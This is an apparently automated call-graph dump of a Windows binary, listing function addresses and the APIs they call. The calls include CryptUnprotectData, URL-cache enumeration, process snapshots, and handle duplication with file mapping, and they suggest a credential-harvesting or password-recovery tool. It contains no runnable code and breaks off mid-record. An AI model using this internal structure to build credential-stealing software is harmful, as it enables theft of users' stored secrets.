38213 445bca 38203->38213 38214 445b38 memset memset memset 38203->38214 38209 44599c 38204->38209 38210 40b2cc 27 API calls 38205->38210 38450 444b06 38206->38450 38218 445a3e 38208->38218 38220 40b2cc 27 API calls 38209->38220 38221 445909 38210->38221 38223 4087b3 335 API calls 38211->38223 38222 445c8b memset memset 38213->38222 38279 445cf0 38213->38279 38226 445bd4 38214->38226 38227 445b98 38214->38227 38215 445849 38660 40b1ab free free 38215->38660 38228 40b2cc 27 API calls 38218->38228 38236 4459ac 38220->38236 38232 409d1f 6 API calls 38221->38232 38237 414c2e 16 API calls 38222->38237 38233 445621 38223->38233 38225 44589f 38661 40b1ab free free 38225->38661 38615 414c2e 38226->38615 38227->38226 38239 445ba2 38227->38239 38241 445a4f 38228->38241 38231 403335 38378 4452e5 43 API calls 38231->38378 38247 445919 38232->38247 38646 4454bf 20 API calls 38233->38646 38234 445823 38234->38215 38256 4087b3 335 API calls 38234->38256 38235 445854 38242 4458aa 38235->38242 38592 403c9c memset memset memset memset memset 38235->38592 38248 409d1f 6 API calls 38236->38248 38249 445cc9 38237->38249 38751 4099c6 wcslen 38239->38751 38240 4456b2 38648 40b1ab free free 38240->38648 38253 409d1f 6 API calls 38241->38253 38242->38194 38275 44594a 38242->38275 38245 445d3d 38274 40b2cc 27 API calls 38245->38274 38246 445d88 memset memset memset 38257 414c2e 16 API calls 38246->38257 38662 409b98 GetFileAttributesW 38247->38662 38258 4459bc 38248->38258 38259 409d1f 6 API calls 38249->38259 38250 445879 38250->38225 38269 4087b3 335 API calls 38250->38269 38252 445680 38252->38240 38500 4087b3 memset 38252->38500 38262 445a63 38253->38262 38254 40b2cc 27 API calls 38263 445bf3 38254->38263 38256->38234 38266 445dde 38257->38266 38727 409b98 GetFileAttributesW 38258->38727 38268 445ce1 38259->38268 38260 445bb3 38754 445403 memset 38260->38754 38272 40b2cc 27 API calls 38262->38272 38631 409d1f wcslen wcslen 38263->38631 38264 445928 38264->38275 38663 40b6ef 38264->38663 38276 40b2cc 27 API calls 38266->38276 38771 409b98 GetFileAttributesW 38268->38771 38269->38250 38281 445a94 38272->38281 38284 445d54 _wcsicmp 38274->38284 38275->38196 38275->38197 38287 445def 38276->38287 38277 4459cb 38277->38196 38294 40b6ef 249 API calls 38277->38294 38279->38231 38279->38245 38279->38246 38280 445389 255 API calls 38280->38213 38728 40ae18 38281->38728 38282 44566d 38282->38328 38551 413d4c 38282->38551 38291 445d71 38284->38291 38355 445d67 38284->38355 38286 445665 38647 40b1ab free free 38286->38647 38292 409d1f 6 API calls 38287->38292 38772 445093 23 API calls 38291->38772 38299 445e03 38292->38299 38294->38196 38295 4456d8 38301 40b2cc 27 API calls 38295->38301 38298 44563c 38298->38286 38304 4087b3 335 API calls 38298->38304 38773 409b98 GetFileAttributesW 38299->38773 38300 40b6ef 249 API calls 38300->38231 38306 4456e2 38301->38306 38302 40b2cc 27 API calls 38307 445c23 38302->38307 38303 445d83 38303->38231 38304->38298 38649 413fa6 _wcsicmp _wcsicmp 38306->38649 38311 409d1f 6 API calls 38307->38311 38309 445e12 38315 445e6b 38309->38315 38322 40b2cc 27 API calls 38309->38322 38313 445c37 38311->38313 38312 4456eb 38318 4456fd memset memset memset memset 38312->38318 38319 4457ea 38312->38319 38320 445389 255 API calls 38313->38320 38314 445b17 38748 40aebe 38314->38748 38775 445093 23 API calls 38315->38775 38650 409c70 wcscpy wcsrchr 38318->38650 38653 413d29 38319->38653 38326 445c47 38320->38326 38327 445e33 38322->38327 38324 445e7e 38329 445f67 38324->38329 38332 40b2cc 27 API calls 38326->38332 38333 409d1f 6 API calls 38327->38333 38328->38235 38569 403e2d memset memset memset memset memset 38328->38569 38335 40b2cc 27 API calls 38329->38335 38330 445ab2 memset 38336 40b2cc 27 API calls 38330->38336 38338 445c53 38332->38338 38334 445e47 38333->38334 38774 409b98 GetFileAttributesW 38334->38774 38340 445f73 38335->38340 38341 445aa1 38336->38341 38337 409c70 2 API calls 38342 44577e 38337->38342 38343 409d1f 6 API calls 38338->38343 38345 409d1f 6 API calls 38340->38345 38341->38314 38341->38330 38346 409d1f 6 API calls 38341->38346 38354 445389 255 API calls 38341->38354 38735 40add4 38341->38735 38740 40ae51 38341->38740 38347 409c70 2 API calls 38342->38347 38348 445c67 38343->38348 38344 445e56 38344->38315 38352 445e83 memset 38344->38352 38349 445f87 38345->38349 38346->38341 38350 44578d 38347->38350 38351 445389 255 API calls 38348->38351 38778 409b98 GetFileAttributesW 38349->38778 38350->38319 38357 40b2cc 27 API calls 38350->38357 38351->38213 38356 40b2cc 27 API calls 38352->38356 38354->38341 38355->38231 38355->38300 38358 445eab 38356->38358 38359 4457a8 38357->38359 38360 409d1f 6 API calls 38358->38360 38361 409d1f 6 API calls 38359->38361 38362 445ebf 38360->38362 38363 4457b8 38361->38363 38364 40ae18 9 API calls 38362->38364 38652 409b98 GetFileAttributesW 38363->38652 38374 445ef5 38364->38374 38366 4457c7 38366->38319 38368 4087b3 335 API calls 38366->38368 38367 40ae51 9 API calls 38367->38374 38368->38319 38369 445f5c 38371 40aebe FindClose 38369->38371 38370 40add4 2 API calls 38370->38374 38371->38329 38372 40b2cc 27 API calls 38372->38374 38373 409d1f 6 API calls 38373->38374 38374->38367 38374->38369 38374->38370 38374->38372 38374->38373 38376 445f3a 38374->38376 38776 409b98 GetFileAttributesW 38374->38776 38777 445093 23 API calls 38376->38777 38378->38172 38379->38177 38380->38172 38381->38170 38383 40c775 38382->38383 38779 40b1ab free free 38383->38779 38385 40c788 38780 40b1ab free free 38385->38780 38387 40c790 38781 40b1ab free free 38387->38781 38389 40c798 38390 40aa04 free 38389->38390 38391 40c7a0 38390->38391 38782 40c274 memset 38391->38782 38396 40a8ab 9 API calls 38397 40c7c3 38396->38397 38398 40a8ab 9 API calls 38397->38398 38399 40c7d0 38398->38399 38811 40c3c3 38399->38811 38403 40c877 38412 40bdb0 38403->38412 38404 40c86c 38839 4053fe 37 API calls 38404->38839 38407 40c813 _wcslwr 38837 40c634 47 API calls 38407->38837 38409 40c829 wcslen 38410 40c7e5 38409->38410 38410->38403 38410->38404 38836 40a706 wcslen memcpy 38410->38836 38838 40c634 47 API calls 38410->38838 38973 404363 38412->38973 38417 40b2cc 27 API calls 38418 40be02 wcslen 38417->38418 38419 40bf5d 38418->38419 38427 40be1e 38418->38427 38990 40440c 38419->38990 38420 40be26 wcsncmp 38420->38427 38423 40be7d memset 38424 40bea7 memcpy 38423->38424 38423->38427 38425 40bf11 wcschr 38424->38425 38424->38427 38425->38427 38426 40b2cc 27 API calls 38428 40bef6 _wcsnicmp 38426->38428 38427->38419 38427->38420 38427->38423 38427->38424 38427->38425 38427->38426 38429 40bf43 LocalFree 38427->38429 38993 40bd5d 28 API calls 38427->38993 38994 404423 38427->38994 38428->38425 38428->38427 38429->38427 38430 4135f7 39006 4135e0 38430->39006 38433 40b2cc 27 API calls 38434 41360d 38433->38434 38435 40a804 8 API calls 38434->38435 38436 413613 38435->38436 38437 41363e 38436->38437 38439 40b273 27 API calls 38436->38439 38438 4135e0 FreeLibrary 38437->38438 38440 413643 38438->38440 38441 413625 38439->38441 38440->38199 38441->38437 38442 413648 38441->38442 38443 413658 38442->38443 38444 4135e0 FreeLibrary 38442->38444 38443->38199 38445 413666 38444->38445 38445->38199 38448 4136e2 38446->38448 38447 413827 38645 41366b FreeLibrary 38447->38645 38448->38447 38449 4137ac CoTaskMemFree 38448->38449 38449->38448 39009 4449b9 38450->39009 38453 444c1f 38453->38185 38454 4449b9 35 API calls 38456 444b4b 38454->38456 38455 444c15 38458 4449b9 35 API calls 38455->38458 38456->38455 39029 444972 GetVersionExW 38456->39029 38458->38453 38459 444b8c 38460 444b99 memcmp 38459->38460 38461 444c0b 38459->38461 39030 444aa5 35 API calls 38459->39030 39031 40a7a0 GetVersionExW 38459->39031 39032 444a85 35 API calls 38459->39032 38460->38459 39033 444a85 35 API calls 38461->39033 38467 40399d 38466->38467 39034 403a16 38467->39034 38469 403a09 39048 40b1ab free free 38469->39048 38471 403a12 wcsrchr 38471->38192 38472 4039a3 38472->38469 38475 4039f4 38472->38475 39045 40a02c CreateFileW 38472->39045 38475->38469 38476 4099c6 2 API calls 38475->38476 38476->38469 38478 414c2e 16 API calls 38477->38478 38479 404048 38478->38479 38480 414c2e 16 API calls 38479->38480 38481 404056 38480->38481 38482 409d1f 6 API calls 38481->38482 38483 404073 38482->38483 38484 409d1f 6 API calls 38483->38484 38485 40408e 38484->38485 38486 409d1f 6 API calls 38485->38486 38487 4040a6 38486->38487 38488 403af5 20 API calls 38487->38488 38489 4040ba 38488->38489 38490 403af5 20 API calls 38489->38490 38491 4040cb 38490->38491 39075 40414f memset 38491->39075 38493 404140 39089 40b1ab free free 38493->39089 38495 4040ec memset 38498 4040e0 38495->38498 38496 404148 38496->38252 38497 4099c6 2 API calls 38497->38498 38498->38493 38498->38495 38498->38497 38499 40a8ab 9 API calls 38498->38499 38499->38498 39102 40a6e6 WideCharToMultiByte 38500->39102 38502 4087ed 39103 4095d9 memset 38502->39103 38505 408809 memset memset memset memset memset 38506 40b2cc 27 API calls 38505->38506 38507 4088a1 38506->38507 38508 409d1f 6 API calls 38507->38508 38509 4088b1 38508->38509 38510 40b2cc 27 API calls 38509->38510 38511 4088c0 38510->38511 38512 409d1f 6 API calls 38511->38512 38513 4088d0 38512->38513 38514 40b2cc 27 API calls 38513->38514 38515 4088df 38514->38515 38516 409d1f 6 API calls 38515->38516 38517 4088ef 38516->38517 38518 40b2cc 27 API calls 38517->38518 38519 4088fe 38518->38519 38537 408953 38537->38252 38552 40b633 free 38551->38552 38553 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38552->38553 38554 413f00 Process32NextW 38553->38554 38555 413da5 OpenProcess 38554->38555 38556 413f17 CloseHandle 38554->38556 38557 413df3 memset 38555->38557 38560 413eb0 38555->38560 38556->38295 39152 413f27 38557->39152 38559 413ebf free 38559->38560 38560->38554 38560->38559 38561 4099f4 3 API calls 38560->38561 38561->38560 38562 413e37 GetModuleHandleW 38564 413e46 38562->38564 38566 413e1f 38562->38566 38564->38566 38565 413e6a QueryFullProcessImageNameW 38565->38566 38566->38562 38566->38565 39157 413959 38566->39157 39173 413ca4 38566->39173 38568 413ea2 CloseHandle 38568->38560 38570 414c2e 16 API calls 38569->38570 38571 403eb7 38570->38571 38572 414c2e 16 API calls 38571->38572 38573 403ec5 38572->38573 38574 409d1f 6 API calls 38573->38574 38575 403ee2 38574->38575 38576 409d1f 6 API calls 38575->38576 38577 403efd 38576->38577 38578 409d1f 6 API calls 38577->38578 38579 403f15 38578->38579 38580 403af5 20 API calls 38579->38580 38581 403f29 38580->38581 38582 403af5 20 API calls 38581->38582 38583 403f3a 38582->38583 38584 40414f 33 API calls 38583->38584 38590 403f4f 38584->38590 38585 403faf 39186 40b1ab free free 38585->39186 38586 403f5b memset 38586->38590 38588 403fb7 38588->38234 38589 4099c6 2 API calls 38589->38590 38590->38585 38590->38586 38590->38589 38591 40a8ab 9 API calls 38590->38591 38591->38590 38593 414c2e 16 API calls 38592->38593 38594 403d26 38593->38594 38595 414c2e 16 API calls 38594->38595 38596 403d34 38595->38596 38597 409d1f 6 API calls 38596->38597 38598 403d51 38597->38598 38599 409d1f 6 API calls 38598->38599 38600 403d6c 38599->38600 38601 409d1f 6 API calls 38600->38601 38602 403d84 38601->38602 38603 403af5 20 API calls 38602->38603 38604 403d98 38603->38604 38605 403af5 20 API calls 38604->38605 38606 403da9 38605->38606 38607 40414f 33 API calls 38606->38607 38613 403dbe 38607->38613 38608 403e1e 39187 40b1ab free free 38608->39187 38609 403dca memset 38609->38613 38611 403e26 38611->38250 38612 4099c6 2 API calls 38612->38613 38613->38608 38613->38609 38613->38612 38614 40a8ab 9 API calls 38613->38614 38614->38613 38616 414b81 8 API calls 38615->38616 38617 414c40 38616->38617 38618 414c73 memset 38617->38618 39188 409cea 38617->39188 38620 414c94 38618->38620 39191 414592 RegOpenKeyExW 38620->39191 38622 414c64 SHGetSpecialFolderPathW 38624 414d0b 38622->38624 38624->38254 38625 414cc1 38626 414cf4 wcscpy 38625->38626 39192 414bb0 wcscpy 38625->39192 38626->38624 38628 414cd2 39193 4145ac RegQueryValueExW 38628->39193 38630 414ce9 RegCloseKey 38630->38626 38632 409d62 38631->38632 38633 409d43 wcscpy 38631->38633 38636 445389 38632->38636 38634 409719 2 API calls 38633->38634 38635 409d51 wcscat 38634->38635 38635->38632 38637 40ae18 9 API calls 38636->38637 38642 4453c4 38637->38642 38638 40ae51 9 API calls 38638->38642 38639 4453f3 38641 40aebe FindClose 38639->38641 38640 40add4 2 API calls 38640->38642 38643 4453fe 38641->38643 38642->38638 38642->38639 38642->38640 38644 445403 250 API calls 38642->38644 38643->38302 38644->38642 38645->38206 38646->38298 38647->38282 38648->38282 38649->38312 38651 409c89 38650->38651 38651->38337 38652->38366 38654 413d39 38653->38654 38655 413d2f FreeLibrary 38653->38655 38656 40b633 free 38654->38656 38655->38654 38657 413d42 38656->38657 38658 40b633 free 38657->38658 38659 413d4a 38658->38659 38659->38328 38660->38235 38661->38242 38662->38264 38664 44db70 38663->38664 38665 40b6fc memset 38664->38665 38666 409c70 2 API calls 38665->38666 38667 40b732 wcsrchr 38666->38667 38668 40b743 38667->38668 38669 40b746 memset 38667->38669 38668->38669 38670 40b2cc 27 API calls 38669->38670 38671 40b76f 38670->38671 38672 409d1f 6 API calls 38671->38672 38673 40b783 38672->38673 39194 409b98 GetFileAttributesW 38673->39194 38675 40b792 38677 409c70 2 API calls 38675->38677 38689 40b7c2 38675->38689 38679 40b7a5 38677->38679 38682 40b2cc 27 API calls 38679->38682 38680 40b837 CloseHandle 38684 40b83e memset 38680->38684 38681 40b817 39278 409a45 GetTempPathW 38681->39278 38685 40b7b2 38682->38685 39228 40a6e6 WideCharToMultiByte 38684->39228 38686 409d1f 6 API calls 38685->38686 38686->38689 38687 40b827 38687->38684 39195 40bb98 38689->39195 38690 40b866 39229 444432 38690->39229 38693 40bad5 38696 40b04b ??3@YAXPAX 38693->38696 38694 40b273 27 API calls 38695 40b89a 38694->38695 39275 438552 38695->39275 38698 40baf3 38696->38698 38698->38275 38700 40bacd 39309 443d90 110 API calls 38700->39309 38703 40bac6 39308 424f26 122 API calls 38703->39308 38704 40b8bd memset 39299 425413 17 API calls 38704->39299 38707 425413 17 API calls 38725 40b8b8 38707->38725 38710 40a71b MultiByteToWideChar 38710->38725 38711 40a734 MultiByteToWideChar 38711->38725 38714 40b9b5 memcmp 38714->38725 38715 4099c6 2 API calls 38715->38725 38716 404423 37 API calls 38716->38725 38719 4251c4 136 API calls 38719->38725 38720 40bb3e memset memcpy 39310 40a734 MultiByteToWideChar 38720->39310 38722 40bb88 LocalFree 38722->38725 38725->38703 38725->38704 38725->38707 38725->38710 38725->38711 38725->38714 38725->38715 38725->38716 38725->38719 38725->38720 38726 40ba5f memcmp 38725->38726 39300 4253ef 16 API calls 38725->39300 39301 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38725->39301 39302 4253af 17 API calls 38725->39302 39303 4253cf 17 API calls 38725->39303 39304 447280 memset 38725->39304 39305 447960 memset memcpy memcpy memcpy 38725->39305 39306 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38725->39306 39307 447920 memcpy memcpy memcpy 38725->39307 38726->38725 38727->38277 38729 40aebe FindClose 38728->38729 38730 40ae21 38729->38730 38731 4099c6 2 API calls 38730->38731 38732 40ae35 38731->38732 38733 409d1f 6 API calls 38732->38733 38734 40ae49 38733->38734 38734->38341 38736 40ade0 38735->38736 38739 40ae0f 38735->38739 38737 40ade7 wcscmp 38736->38737 38736->38739 38738 40adfe wcscmp 38737->38738 38737->38739 38738->38739 38739->38341 38741 40ae7b FindNextFileW 38740->38741 38742 40ae5c FindFirstFileW 38740->38742 38743 40ae94 38741->38743 38744 40ae8f 38741->38744 38742->38743 38746 40aeb6 38743->38746 38747 409d1f 6 API calls 38743->38747 38745 40aebe FindClose 38744->38745 38745->38743 38746->38341 38747->38746 38749 40aed1 38748->38749 38750 40aec7 FindClose 38748->38750 38749->38203 38750->38749 38752 4099d7 38751->38752 38753 4099da memcpy 38751->38753 38752->38753 38753->38260 38755 40b2cc 27 API calls 38754->38755 38756 44543f 38755->38756 38757 409d1f 6 API calls 38756->38757 38758 44544f 38757->38758 39696 409b98 GetFileAttributesW 38758->39696 38760 44545e 38761 445476 38760->38761 38762 40b6ef 249 API calls 38760->38762 38763 40b2cc 27 API calls 38761->38763 38762->38761 38764 445482 38763->38764 38765 409d1f 6 API calls 38764->38765 38766 445492 38765->38766 39697 409b98 GetFileAttributesW 38766->39697 38768 4454a1 38769 4454b9 38768->38769 38770 40b6ef 249 API calls 38768->38770 38769->38280 38770->38769 38771->38279 38772->38303 38773->38309 38774->38344 38775->38324 38776->38374 38777->38374 38778->38355 38779->38385 38780->38387 38781->38389 38783 414c2e 16 API calls 38782->38783 38784 40c2ae 38783->38784 38840 40c1d3 38784->38840 38789 40c3be 38806 40a8ab 38789->38806 38790 40afcf 2 API calls 38791 40c2fd FindFirstUrlCacheEntryW 38790->38791 38792 40c3b6 38791->38792 38793 40c31e wcschr 38791->38793 38794 40b04b ??3@YAXPAX 38792->38794 38795 40c331 38793->38795 38796 40c35e FindNextUrlCacheEntryW 38793->38796 38794->38789 38798 40a8ab 9 API calls 38795->38798 38796->38793 38797 40c373 GetLastError 38796->38797 38799 40c3ad FindCloseUrlCache 38797->38799 38800 40c37e 38797->38800 38801 40c33e wcschr 38798->38801 38799->38792 38802 40afcf 2 API calls 38800->38802 38801->38796 38803 40c34f 38801->38803 38804 40c391 FindNextUrlCacheEntryW 38802->38804 38805 40a8ab 9 API calls 38803->38805 38804->38793 38804->38799 38805->38796 38934 40a97a 38806->38934 38809 40a8cc 38809->38396 38810 40a8d0 7 API calls 38810->38809 38939 40b1ab free free 38811->38939 38813 40c3dd 38814 40b2cc 27 API calls 38813->38814 38815 40c3e7 38814->38815 38940 414592 RegOpenKeyExW 38815->38940 38817 40c3f4 38818 40c50e 38817->38818 38819 40c3ff 38817->38819 38833 405337 38818->38833 38820 40a9ce 4 API calls 38819->38820 38821 40c418 memset 38820->38821 38941 40aa1d 38821->38941 38824 40c471 38826 40c47a _wcsupr 38824->38826 38825 40c505 RegCloseKey 38825->38818 38827 40a8d0 7 API calls 38826->38827 38828 40c498 38827->38828 38829 40a8d0 7 API calls 38828->38829 38830 40c4ac memset 38829->38830 38831 40aa1d 38830->38831 38832 40c4e4 RegEnumValueW 38831->38832 38832->38825 38832->38826 38943 405220 38833->38943 38835 405340 38835->38410 38836->38407 38837->38409 38838->38410 38839->38403 38841 40ae18 9 API calls 38840->38841 38847 40c210 38841->38847 38842 40ae51 9 API calls 38842->38847 38843 40c264 38844 40aebe FindClose 38843->38844 38846 40c26f 38844->38846 38845 40add4 2 API calls 38845->38847 38852 40e5ed memset memset 38846->38852 38847->38842 38847->38843 38847->38845 38848 40c231 _wcsicmp 38847->38848 38849 40c1d3 34 API calls 38847->38849 38848->38847 38850 40c248 38848->38850 38849->38847 38865 40c084 21 API calls 38850->38865 38853 414c2e 16 API calls 38852->38853 38854 40e63f 38853->38854 38855 409d1f 6 API calls 38854->38855 38856 40e658 38855->38856 38866 409b98 GetFileAttributesW 38856->38866 38858 40e667 38859 409d1f 6 API calls 38858->38859 38861 40e680 38858->38861 38859->38861 38867 409b98 GetFileAttributesW 38861->38867 38862 40e68f 38863 40c2d8 38862->38863 38868 40e4b2 38862->38868 38863->38789 38863->38790 38865->38847 38866->38858 38867->38862 38889 40e01e 38868->38889 38870 40e593 38871 40e5b0 38870->38871 38872 40e59c DeleteFileW 38870->38872 38873 40b04b ??3@YAXPAX 38871->38873 38872->38871 38875 40e5bb 38873->38875 38874 40e521 38874->38870 38912 40e175 38874->38912 38877 40e5c4 CloseHandle 38875->38877 38878 40e5cc 38875->38878 38877->38878 38880 40b633 free 38878->38880 38879 40e573 38881 40e584 38879->38881 38882 40e57c CloseHandle 38879->38882 38883 40e5db 38880->38883 38933 40b1ab free free 38881->38933 38882->38881 38884 40b633 free 38883->38884 38886 40e5e3 38884->38886 38886->38863 38888 40e540 38888->38879 38932 40e2ab 30 API calls 38888->38932 38890 406214 22 API calls 38889->38890 38891 40e03c 38890->38891 38892 40e16b 38891->38892 38893 40dd85 60 API calls 38891->38893 38892->38874 38894 40e06b 38893->38894 38894->38892 38895 40afcf ??2@YAPAXI ??3@YAXPAX 38894->38895 38896 40e08d OpenProcess 38895->38896 38897 40e0a4 GetCurrentProcess DuplicateHandle 38896->38897 38901 40e152 38896->38901 38898 40e0d0 GetFileSize 38897->38898 38899 40e14a CloseHandle 38897->38899 38902 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38898->38902 38899->38901 38900 40e160 38904 40b04b ??3@YAXPAX 38900->38904 38901->38900 38903 406214 22 API calls 38901->38903 38905 40e0ea 38902->38905 38903->38900 38904->38892 38906 4096dc CreateFileW 38905->38906 38907 40e0f1 CreateFileMappingW 38906->38907 38908 40e140 CloseHandle CloseHandle 38907->38908 38909 40e10b MapViewOfFile 38907->38909 38908->38899 38910 40e13b CloseHandle 38909->38910 38911 40e11f WriteFile UnmapViewOfFile 38909->38911 38910->38908 38911->38910 38913 40e18c 38912->38913 38914 406b90 11 API calls 38913->38914 38915 40e19f 38914->38915 38916 40e1a7 memset 38915->38916 38917 40e299 38915->38917 38922 40e1e8 38916->38922 38918 4069a3 ??3@YAXPAX free 38917->38918 38919 40e2a4 38918->38919 38919->38888 38920 406e8f 13 API calls 38920->38922 38921 406b53 SetFilePointerEx ReadFile 38921->38922 38922->38920 38922->38921 38923 40dd50 _wcsicmp 38922->38923 38924 40e283 38922->38924 38928 40742e 8 API calls 38922->38928 38929 40aae3 wcslen wcslen _memicmp 38922->38929 38930 40e244 _snwprintf 38922->38930 38923->38922 38925 40e291 38924->38925 38926 40e288 free 38924->38926 38927 40aa04 free 38925->38927 38926->38925 38927->38917 38928->38922 38929->38922 38931 40a8d0 7 API calls 38930->38931 38931->38922 38932->38888 38933->38870 38936 40a980 38934->38936 38935 40a8bb 38935->38809 38935->38810 38936->38935 38937 40a995 _wcsicmp 38936->38937 38938 40a99c wcscmp 38936->38938 38937->38936 38938->38936 38939->38813 38940->38817 38942 40aa23 RegEnumValueW 38941->38942 38942->38824 38942->38825 38944 40522a 38943->38944 38969 405329 38943->38969 38945 40b2cc 27 API calls 38944->38945 38946 405234 38945->38946 38947 40a804 8 API calls 38946->38947 38948 40523a 38947->38948 38970 40b273 38948->38970 38950 405248 _mbscpy _mbscat 38951 40526c 38950->38951 38952 40b273 27 API calls 38951->38952 38953 405279 38952->38953 38954 40b273 27 API calls 38953->38954 38955 40528f 38954->38955 38956 40b273 27 API calls 38955->38956 38957 4052a5 38956->38957 38958 40b273 27 API calls 38957->38958 38959 4052bb 38958->38959 38960 40b273 27 API calls 38959->38960 38961 4052d1 38960->38961 38962 40b273 27 API calls 38961->38962 38963 4052e7 38962->38963 38964 40b273 27 API calls 38963->38964 38965 4052fd 38964->38965 38966 40b273 27 API calls 38965->38966 38967 405313 38966->38967 38968 40b273 27 API calls 38967->38968 38968->38969 38969->38835 38971 40b58d 27 API calls 38970->38971 38972 40b18c 38971->38972 38972->38950 38974 40440c FreeLibrary 38973->38974 38975 40436d 38974->38975 38976 40a804 8 API calls 38975->38976 38977 404377 38976->38977 38978 4043f7 38977->38978 38979 40b273 27 API calls 38977->38979 38978->38417 38978->38419 38980 40438d 38979->38980 38981 40b273 27 API calls 38980->38981 38982 4043a7 38981->38982 38983 40b273 27 API calls 38982->38983 38984 4043ba 38983->38984 38985 40b273 27 API calls 38984->38985 38986 4043ce 38985->38986 38987 40b273 27 API calls 38986->38987 38988 4043e2 38987->38988 38988->38978 38989 40440c FreeLibrary 38988->38989 38989->38978 38991 404413 FreeLibrary 38990->38991 38992 40441e 38990->38992 38991->38992 38992->38430 38993->38427 38995 40447e 38994->38995 38996 40442e 38994->38996 38997 404485 CryptUnprotectData 38995->38997 38998 40449c 38995->38998 38999 40b2cc 27 API calls 38996->38999 38997->38998 38998->38427 39000 404438 38999->39000 39001 40a804 8 API calls 39000->39001 39002 40443e 39001->39002 39003 40444f 39002->39003 39004 40b273 27 API calls 39002->39004 39003->38995 39005 404475 FreeLibrary 39003->39005 39004->39003 39005->38995 39007 4135f6 39006->39007 39008 4135eb FreeLibrary 39006->39008 39007->38433 39008->39007 39010 4449c4 39009->39010 39028 444a48 39009->39028 39011 40b2cc 27 API calls 39010->39011 39012 4449cb 39011->39012 39013 40a804 8 API calls 39012->39013 39014 4449d1 39013->39014 39015 40b273 27 API calls 39014->39015 39016 4449dc 39015->39016 39017 40b273 27 API calls 39016->39017 39028->38453 39028->38454 39029->38459 39030->38459 39031->38459 39032->38459 39033->38455 39035 403a29 39034->39035 39049 403bed memset memset 39035->39049 39037 403ae7 39062 40b1ab free free 39037->39062 39038 403a3f memset 39042 403a2f 39038->39042 39040 403aef 39040->38472 39041 409d1f 6 API calls 39041->39042 39042->39037 39042->39038 39042->39041 39043 409b98 GetFileAttributesW 39042->39043 39044 40a8d0 7 API calls 39042->39044 39043->39042 39044->39042 39046 40a051 GetFileTime CloseHandle 39045->39046 39047 4039ca CompareFileTime 39045->39047 39046->39047 39047->38472 39048->38471 39050 414c2e 16 API calls 39049->39050 39051 403c38 39050->39051 39052 409719 2 API calls 39051->39052 39053 403c3f wcscat 39052->39053 39054 414c2e 16 API calls 39053->39054 39055 403c61 39054->39055 39056 409719 2 API calls 39055->39056 39057 403c68 wcscat 39056->39057 39063 403af5 39057->39063 39060 403af5 20 API calls 39061 403c95 39060->39061 39061->39042 39062->39040 39064 403b02 39063->39064 39065 40ae18 9 API calls 39064->39065 39074 403b37 39065->39074 39066 403bdb 39068 40aebe FindClose 39066->39068 39067 40add4 wcscmp wcscmp 39067->39074 39069 403be6 39068->39069 39069->39060 39070 40a8d0 7 API calls 39070->39074 39071 40ae18 9 API calls 39071->39074 39072 40ae51 9 API calls 39072->39074 39073 40aebe FindClose 39073->39074 39074->39066 39074->39067 39074->39070 39074->39071 39074->39072 39074->39073 39076 409d1f 6 API calls 39075->39076 39077 404190 39076->39077 39090 409b98 GetFileAttributesW 39077->39090 39079 40419c 39080 4041a7 6 API calls 39079->39080 39081 40435c 39079->39081 39082 40424f 39080->39082 39081->38498 39082->39081 39084 40425e memset 39082->39084 39086 409d1f 6 API calls 39082->39086 39087 40a8ab 9 API calls 39082->39087 39091 414842 39082->39091 39084->39082 39085 404296 wcscpy 39084->39085 39085->39082 39086->39082 39088 4042b6 memset memset _snwprintf wcscpy 39087->39088 39088->39082 39089->38496 39090->39079 39094 41443e 39091->39094 39093 414866 39093->39082 39095 41444b 39094->39095 39096 414451 39095->39096 39097 4144a3 GetPrivateProfileStringW 39095->39097 39098 414491 39096->39098 39099 414455 wcschr 39096->39099 39097->39093 39101 414495 WritePrivateProfileStringW 39098->39101 39099->39098 39100 414463 _snwprintf 39099->39100 39100->39101 39101->39093 39102->38502 39104 40b2cc 27 API calls 39103->39104 39105 409615 39104->39105 39106 409d1f 6 API calls 39105->39106 39107 409625 39106->39107 39130 409b98 GetFileAttributesW 39107->39130 39109 409634 39110 409648 39109->39110 39147 4091b8 238 API calls 39109->39147 39112 40b2cc 27 API calls 39110->39112 39114 408801 39110->39114 39113 40965d 39112->39113 39115 409d1f 6 API calls 39113->39115 39114->38505 39114->38537 39116 40966d 39115->39116 39131 409b98 GetFileAttributesW 39116->39131 39118 40967c 39118->39114 39132 409529 39118->39132 39130->39109 39131->39118 39148 4096c3 CreateFileW 39132->39148 39134 409543 39135 4095cd 39134->39135 39136 409550 GetFileSize 39134->39136 39135->39114 39137 409577 CloseHandle 39136->39137 39138 40955f 39136->39138 39137->39135 39143 409585 39137->39143 39139 40afcf 2 API calls 39138->39139 39140 409569 39139->39140 39149 40a2ef ReadFile 39140->39149 39142 409574 39142->39137 39143->39135 39144 4095c3 39143->39144 39150 408b8d 38 API calls 39143->39150 39151 40908b 55 API calls 39144->39151 39147->39110 39148->39134 39149->39142 39150->39143 39151->39135 39179 413f4f 39152->39179 39155 413f37 K32GetModuleFileNameExW 39156 413f4a 39155->39156 39156->38566 39158 413969 wcscpy 39157->39158 39159 41396c wcschr 39157->39159 39171 413a3a 39158->39171 39159->39158 39161 41398e 39159->39161 39183 4097f7 wcslen wcslen _memicmp 39161->39183 39163 41399a 39164 4139a4 memset 39163->39164 39165 4139e6 39163->39165 39184 409dd5 GetWindowsDirectoryW wcscpy 39164->39184 39167 413a31 wcscpy 39165->39167 39168 4139ec memset 39165->39168 39167->39171 39185 409dd5 GetWindowsDirectoryW wcscpy 39168->39185 39169 4139c9 wcscpy wcscat 39169->39171 39171->38566 39172 413a11 memcpy wcscat 39172->39171 39174 413cb0 GetModuleHandleW 39173->39174 39175 413cda 39173->39175 39174->39175 39176 413cbf 39174->39176 39177 413ce3 GetProcessTimes 39175->39177 39178 413cf6 39175->39178 39176->39175 39177->38568 39178->38568 39180 413f54 39179->39180 39182 413f2f 39179->39182 39181 40a804 8 API calls 39180->39181 39181->39182 39182->39155 39182->39156 39183->39163 39184->39169 39185->39172 39186->38588 39187->38611 39189 409cf9 GetVersionExW 39188->39189 39190 409d0a 39188->39190 39189->39190 39190->38618 39190->38622 39191->38625 39192->38628 39193->38630 39194->38675 39196 40bba5 39195->39196 39311 40cc26 39196->39311 39199 40bd4b 39332 40cc0c 39199->39332 39204 40b2cc 27 API calls 39205 40bbef 39204->39205 39339 40ccf0 _wcsicmp 39205->39339 39207 40bbf5 39207->39199 39340 40ccb4 6 API calls 39207->39340 39209 40bc26 39210 